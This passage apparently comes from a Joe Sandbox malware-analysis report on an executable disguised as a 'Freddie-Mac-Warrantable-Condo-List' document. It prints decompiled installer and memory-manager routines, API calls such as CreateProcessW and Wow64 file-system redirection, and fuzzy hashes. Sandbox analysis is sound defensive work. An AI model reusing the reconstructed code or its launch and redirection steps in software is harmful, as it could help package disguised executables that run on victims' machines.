							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x4bbaf0 - 0x13ffe0;
							if( *0x4bbaf0 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E00403B60(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x4bbaf0 = 0x13ffe0;
								 *0x4bbaec = _t82;
								 *0x4bbae8 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x4bbae8 = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E00403B00(_t106, _t88, _t81);
							 *0x4bbae8 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 0x10) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 8);
							 *(__edx + 0xc) = __ebx;
							 *(__edx + 8) = __ecx;
							 *(__ecx + 0xc) = __edx;
							 *(__ebx + 8) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}

0x0040426c
0x0040426c
0x00404275
0x0040427b
0x00404364
0x00404367
0x00404454
0x00404455
0x00404458
0x00403cf8
0x00403cfa
0x00403cfc
0x00403d01
0x00403d04
0x00403d09
0x00403d0d
0x00403d13
0x00403d17
0x00403d1d
0x00403d39
0x00403d3d
0x00403d40
0x00403d40
0x00403d42
0x00403d4a
0x00403d57
0x00403d5c
0x00403d5e
0x00403d60
0x00403d63
0x00403d63
0x00403d65
0x00403d69
0x00403d6b
0x00403d6d
0x00403d6f
0x00000000
0x00403d6f
0x00000000
0x00403d6b
0x00403d1f
0x00403d27
0x00403d2e
0x00403d34
0x00403d30
0x00403d30
0x00403d30
0x00403d2e
0x00403d73
0x00403d75
0x00403d7e
0x00403d87
0x00403d87
0x00403d8a
0x00403d9a
0x0040445e
0x00404463
0x00404463
0x00000000
0x00000000
0x00000000
0x00404281
0x00404281
0x00404283
0x00404285
0x004042e8
0x004042e8
0x004042ed
0x004042f1
0x00000000
0x00000000
0x004042f3
0x004042f5
0x004042fc
0x00000000
0x004042fe
0x00404302
0x00404307
0x00404308
0x00404309
0x0040430e
0x00404312
0x0040431c
0x00404321
0x00404322
0x00000000
0x00404322
0x00404312
0x00000000
0x004042fc
0x004042e8
0x00404287
0x00404287
0x00404287
0x00404287
0x0040428b
0x0040428e
0x004042bc
0x004042be
0x004042d3
0x004042d3
0x004042c0
0x004042c0
0x004042c3
0x004042c6
0x004042c9
0x004042cc
0x004042ce
0x004042d1
0x00000000
0x00000000
0x004042d1
0x004042d6
0x004042d8
0x004042da
0x004042dd
0x0040436d
0x00404370
0x00404372
0x00404374
0x00404375
0x00404377
0x00404328
0x00404328
0x0040432d
0x00404335
0x00000000
0x00000000
0x00404337
0x00404339
0x00404340
0x00000000
0x00404342
0x00404344
0x00404349
0x0040434e
0x00404356
0x0040435a
0x00000000
0x0040435a
0x00404356
0x00000000
0x00404340
0x00404328
0x00404379
0x00404379
0x00404381
0x00404385
0x004043bc
0x004043bf
0x004043c2
0x004043c4
0x004043ca
0x004043cc
0x004043cc
0x00404387
0x00404387
0x00404387
0x0040438a
0x0040438a
0x0040438e
0x00404392
0x004043d4
0x004043d7
0x004043d9
0x004043db
0x004043e1
0x004043e5
0x004043e5
0x004043e1
0x00404394
0x0040439a
0x004043ec
0x004043f6
0x00404424
0x0040442a
0x0040442f
0x00404436
0x00404440
0x00404446
0x0040444d
0x00404451
0x004043f8
0x004043f8
0x004043fb
0x004043fd
0x00404400
0x00404403
0x00404405
0x00404414
0x00404419
0x0040441c
0x00404420
0x00404420
0x0040439c
0x0040439f
0x004043a2
0x004043aa
0x004043af
0x004043b6
0x004043ba
0x004043ba
0x00404290
0x00404290
0x00404292
0x00404298
0x0040429b
0x004042a4
0x004042a7
0x004042aa
0x004042ad
0x004042b0
0x004042b3
0x004042b6
0x004042b6
0x004042b8
0x004042b9
0x0040429d
0x0040429d
0x0040429d
0x0040429f
0x004042a1
0x004042a2
0x004042a2
0x0040429b
0x0040428e

APIs

Sleep.KERNEL32(00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA,00000000), ref: 00404302
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA), ref: 0040431C

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
Instruction ID: daf3465a9571387f72e828d046180f4ce70f3b260d456b91f151aa63c4646fa2
Opcode Fuzzy Hash: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
Instruction Fuzzy Hash: AA71E2B17042008BD715DF29CC84B16BBD8AF85715F2482BFE984AB3D2D7B899418789

Uniqueness

Uniqueness Score: -1.00%

Function 004B60E8, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 165
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E004B60E8(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t26;
				intOrPtr _t31;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t61;
				WCHAR* _t63;
				intOrPtr _t69;
				intOrPtr _t74;
				int _t75;
				intOrPtr _t76;
				intOrPtr _t78;
				struct HWND__* _t81;
				intOrPtr _t82;
				intOrPtr _t86;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t107;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t120;
				intOrPtr _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t85 = __ebx;
				_pop(_t101);
				_pop(_t88);
				 *[fs:eax] = _t101;
				E004AF678(_t88);
				if( *0x4ba440 == 0) {
					if(( *0x4c1d71 & 0x00000001) == 0 &&  *0x4ba441 == 0) {
						_t61 =  *0x4ba674; // 0x4c0d0c
						_t4 = _t61 + 0x2f8; // 0x0
						_t63 = E004084EC( *_t4);
						_t88 = _t120 - 0x28;
						_t101 =  *0x4c1c48; // 0x0
						E00426F08(0xc2, _t120 - 0x28, _t101);
						if(MessageBoxW(0, E004084EC( *((intOrPtr*)(_t120 - 0x28))), _t63, 0x24) != 6) {
							 *0x4ba44c = 2;
							E0041F238();
						}
					}
					E004056D0();
					E004AEFE8(_t120 - 0x2c, _t85, _t101, _t118, _t119); // executed
					E00407E00(0x4c1d94,  *((intOrPtr*)(_t120 - 0x2c)));
					_t26 =  *0x4c1d84; // 0x0
					E00422954(_t26, _t88, _t120 - 0x34);
					E004226C8( *((intOrPtr*)(_t120 - 0x34)), _t85, _t120 - 0x30, L".tmp", _t118, _t119);
					_push( *((intOrPtr*)(_t120 - 0x30)));
					_t31 =  *0x4c1d94; // 0x0
					E00422660(_t31, _t120 - 0x38);
					_pop(_t90);
					E0040873C(0x4c1d98, _t90,  *((intOrPtr*)(_t120 - 0x38)));
					_t107 =  *0x4c1d98; // 0x0
					E00407E00(0x4c1d9c, _t107);
					_t37 =  *0x4c1d90; // 0x4d582c
					_t15 = _t37 + 0x14; // 0x61f9f4f
					_t38 =  *0x4c1d88; // 0x0
					E00423CE8(_t38,  *_t15);
					_push(_t120);
					_push(0x4b63ab);
					_push( *[fs:edx]);
					 *[fs:edx] = _t121;
					 *0x4c1de0 = 0;
					_t42 = E00423D00(1, 0, 1, 0); // executed
					 *0x4c1d8c = _t42;
					_push(_t120);
					_push(0x4b639a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t44 =  *0x4c1d90; // 0x4d582c
					_t16 = _t44 + 0x18; // 0x302c00
					 *0x4c1de0 = E004053F0( *_t16);
					_t47 =  *0x4c1d90; // 0x4d582c
					_t17 = _t47 + 0x18; // 0x302c00
					_t86 =  *0x4c1de0; // 0x7fb50010
					E00405884(_t86,  *_t17);
					_push(_t120);
					_push(0x4b62e9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t51 =  *0x424cd8; // 0x424d30
					_t93 =  *0x4c1d88; // 0x0
					_t53 = E00424748(_t93, 1, _t51); // executed
					 *0x4c1de4 = _t53;
					_push(_t120);
					_push(0x4b62d8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t55 =  *0x4c1d90; // 0x4d582c
					_t18 = _t55 + 0x18; // 0x302c00
					_t56 =  *0x4c1de4; // 0x22a0f00
					E00424A24(_t56,  *_t18, _t86);
					_pop(_t114);
					 *[fs:eax] = _t114;
					_push(E004B62DF);
					_t59 =  *0x4c1de4; // 0x22a0f00
					return E00405CE8(_t59);
				} else {
					_t69 =  *0x4ba674; // 0x4c0d0c
					_t1 = _t69 + 0x1d0; // 0x0
					E004AFA44( *_t1, __ebx, __edi, __esi);
					 *0x4ba44c = 0;
					_pop(_t115);
					 *[fs:eax] = _t115;
					_push(E004B6554);
					_t74 =  *0x4c1d88; // 0x0
					_t75 = E00405CE8(_t74);
					if( *0x4c1d9c != 0) {
						_t117 =  *0x4c1d9c; // 0x0
						_t75 = E004AF1B4(0, _t117, 0xfa, 0x32); // executed
					}
					if( *0x4c1d94 != 0) {
						_t82 =  *0x4c1d94; // 0x0
						_t75 = RemoveDirectoryW(E004084EC(_t82)); // executed
					}
					if( *0x4ba450 != 0) {
						_t81 =  *0x4ba450; // 0x90236
						_t75 = DestroyWindow(_t81); // executed
					}
					if( *0x4c1d78 != 0) {
						_t76 =  *0x4c1d78; // 0x0
						_t99 =  *0x4c1d7c; // 0x1
						_t116 =  *0x426bb0; // 0x426bb4
						E00408D08(_t76, _t99, _t116);
						_t78 =  *0x4c1d78; // 0x0
						E0040540C(_t78);
						 *0x4c1d78 = 0;
						return 0;
					}
					return _t75;
				}
			}

0x004b60e8
0x004b60e8
0x004b60e8
0x004b60ea
0x004b60ec
0x004b60ed
0x004b610d
0x004b6119
0x004b613e
0x004b614b
0x004b6150
0x004b6156
0x004b615c
0x004b615f
0x004b6169
0x004b6181
0x004b6183
0x004b618d
0x004b618d
0x004b6181
0x004b6192
0x004b619a
0x004b61a7
0x004b61af
0x004b61b4
0x004b61c4
0x004b61cc
0x004b61d0
0x004b61d5
0x004b61e2
0x004b61e3
0x004b61ed
0x004b61f3
0x004b61f8
0x004b61fd
0x004b6200
0x004b6205
0x004b620c
0x004b620d
0x004b6212
0x004b6215
0x004b621a
0x004b6232
0x004b6237
0x004b623e
0x004b623f
0x004b6244
0x004b6247
0x004b624a
0x004b624f
0x004b6257
0x004b625c
0x004b6261
0x004b6264
0x004b626e
0x004b6275
0x004b6276
0x004b627b
0x004b627e
0x004b6281
0x004b6287
0x004b6294
0x004b6299
0x004b62a0
0x004b62a1
0x004b62a6
0x004b62a9
0x004b62ac
0x004b62b1
0x004b62b6
0x004b62bb
0x004b62c2
0x004b62c5
0x004b62c8
0x004b62cd
0x004b62d7
0x004b611b
0x004b611b
0x004b6120
0x004b6126
0x004b612d
0x004b64b5
0x004b64b8
0x004b64bb
0x004b64c0
0x004b64c5
0x004b64d1
0x004b64df
0x004b64e7
0x004b64e7
0x004b64f3
0x004b64f5
0x004b6500
0x004b6500
0x004b650c
0x004b650e
0x004b6514
0x004b6514
0x004b6520
0x004b6522
0x004b6527
0x004b652d
0x004b6533
0x004b6538
0x004b653d
0x004b6544
0x00000000
0x004b6544
0x004b6549
0x004b6549

APIs

MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 004B6179

Part of subcall function 004AFA44: MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE

RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
DestroyWindow.USER32(00090236,004B6554), ref: 004B6514

Part of subcall function 004AF1B4: Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200

Strings

,XM, xrefs: 004B61F8, 004B624A, 004B625C, 004B62AC
0MB, xrefs: 004B6281
.tmp, xrefs: 004B61BF

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ErrorLastMessage$DestroyDirectoryRemoveSleepWindow
String ID: ,XM$.tmp$0MB
API String ID: 3858953238-2140637138
Opcode ID: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
Instruction ID: b159488041d1577a8b45ed1a1d18f26c00613076fc9a683522f38ff229f2206a
Opcode Fuzzy Hash: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
Instruction Fuzzy Hash: AC615A342002009FD755EF69ED86EAA37A5EB4A308F51453AF801976B2DA3CBC51CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004AF728, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E004AF728(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				struct _STARTUPINFOW _v76;
				void* _v88;
				void* _v92;
				int _t23;
				intOrPtr _t49;
				DWORD* _t51;
				void* _t56;

				_v8 = 0;
				_t51 = __ecx;
				_t53 = __edx;
				_t41 = __eax;
				_push(_t56);
				_push(0x4af7ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffa8;
				_push(0x4af81c);
				_push(__eax);
				_push(0x4af82c);
				_push(__edx);
				E004087C4( &_v8, __eax, 4, __ecx, __edx);
				E00405884( &_v76, 0x44);
				_v76.cb = 0x44;
				_t23 = CreateProcessW(0, E004084EC(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
				_t58 = _t23;
				if(_t23 == 0) {
					E004AF34C(0x83, _t41, 0, _t53, _t58);
				}
				CloseHandle(_v88);
				do {
					E004AF6FC();
				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0x4ff) == 1);
				E004AF6FC();
				GetExitCodeProcess(_v92, _t51); // executed
				CloseHandle(_v92);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(0x4af806);
				return E00407A20( &_v8);
			}

0x004af733
0x004af736
0x004af738
0x004af73a
0x004af73e
0x004af73f
0x004af744
0x004af747
0x004af74a
0x004af74f
0x004af750
0x004af755
0x004af75e
0x004af76d
0x004af772
0x004af798
0x004af79d
0x004af79f
0x004af7a5
0x004af7a5
0x004af7ae
0x004af7b3
0x004af7b3
0x004af7cc
0x004af7d1
0x004af7db
0x004af7e4
0x004af7eb
0x004af7ee
0x004af7f1
0x004af7fe

APIs

CreateProcessW.KERNEL32 ref: 004AF798
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
GetExitCodeProcess.KERNEL32 ref: 004AF7DB
CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4

Part of subcall function 004AF34C: GetLastError.KERNEL32(00000000,004AF3F5,?,?,00000000), ref: 004AF36F

Strings

D, xrefs: 004AF772

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
String ID: D
API String ID: 3356880605-2746444292
Opcode ID: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
Instruction ID: 88989adc3f1fa39a5a5eb6990527994e2deb527bcdcae90bffb7d35c0d41af56
Opcode Fuzzy Hash: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
Instruction Fuzzy Hash: C01163716041096EEB00FBE68C42F9F77ACDF56714F50053AB604E72C5DA789905866D

Uniqueness

Uniqueness Score: -1.00%

Function 004B5A90, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E004B5A90(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _t16;
				intOrPtr _t32;
				intOrPtr _t41;

				_t27 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t41);
				_push(0x4b5b5a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				 *0x4c1124 =  *0x4c1124 - 1;
				if( *0x4c1124 < 0) {
					 *0x4c1128 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
					 *0x4c112c = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
					if( *0x4c1128 == 0 ||  *0x4c112c == 0) {
						_t16 = 0;
					} else {
						_t16 = 1;
					}
					 *0x4c1130 = _t16;
					E00422D44( &_v12);
					E00422660(_v12,  &_v8);
					E004086E4( &_v8, L"shell32.dll");
					E00421230(_v8, _t27, 0x8000); // executed
					E004232EC(0x4c783afb,  &_v16);
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_push(0x4b5b61);
				return E00407A80( &_v16, 3);
			}

0x004b5a90
0x004b5a93
0x004b5a95
0x004b5a97
0x004b5a9b
0x004b5a9c
0x004b5aa1
0x004b5aa4
0x004b5aa7
0x004b5aae
0x004b5ac9
0x004b5ae3
0x004b5aef
0x004b5afa
0x004b5afe
0x004b5afe
0x004b5afe
0x004b5b00
0x004b5b08
0x004b5b13
0x004b5b20
0x004b5b2d
0x004b5b3a
0x004b5b3a
0x004b5b41
0x004b5b44
0x004b5b47
0x004b5b59

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5ABE

Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2

GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5AD8

Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00000000), ref: 0040E20B

Strings

shell32.dll, xrefs: 004B5B1B
kernel32.dll, xrefs: 004B5AB9, 004B5AD3
Wow64DisableWow64FsRedirection, xrefs: 004B5AB4
Wow64RevertWow64FsRedirection, xrefs: 004B5ACE

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
Instruction ID: b56c6da1e02aeac4ac36a9fb763b3b3a2bfa4c382daca5c5ea2a5d16c2919690
Opcode Fuzzy Hash: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
Instruction Fuzzy Hash: DA11A730604704AFD744EB76DC02F9DB7B4E749704F64447BF500A6591CABC6A04CA3D

Uniqueness

Uniqueness Score: -1.00%

Function 00403EE8, Relevance: 9.0, APIs: 7, Instructions: 298
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00403EE8(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t95 = __eax;
				_t129 =  *0x4bb059; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t2 = _t162 + 0x10010; // 0x10110
							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E00403C48();
								_t99 =  *0x4bdb80; // 0x4bdb7c
								 *_t147 = 0x4bdb7c;
								 *0x4bdb80 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x4bdb78 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t67 = _t95 + 0xd3; // 0x1d3
						_t125 = (_t67 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t68 = _t125 - 0xb30; // -2445
						_t141 = _t68;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x4bbaf8 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x4bbaf4;
							if((0xfffffffe << _t132 &  *0x4bbaf4) == 0) {
								_t133 =  *0x4bbaf0; // 0x0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E00403BCC(_t125);
								} else {
									_t110 =  *0x4bbaec; // 0x2290dd0
									_t109 = _t110 - _t125;
									 *0x4bbaec = _t109;
									 *0x4bbaf0 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x4bbae8 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x4bbb78 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x4bbaf8 + _t142 * 4;
								 *_t80 =  *(0x4bbaf8 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x4bbaf4], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E00403B00(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							_t93 = _t125 + 2; // 0x1a5
							 *(_t159 - 4) = _t93;
							 *0x4bbae8 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					_t6 = __edx + 0x4bb990; // 0xc8c8c8c8
					__eax =  *_t6 & 0x000000ff;
					__ebx = 0x4b7080 + ( *_t6 & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 8);
					__eax =  *(__edx + 0x10);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x18);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0x14);
						if(__eax >  *(__ebx + 0x14)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x4bb059;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x4bbae8], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x4bbaf4;
							__eflags =  *(__ebx + 1) &  *0x4bbaf4;
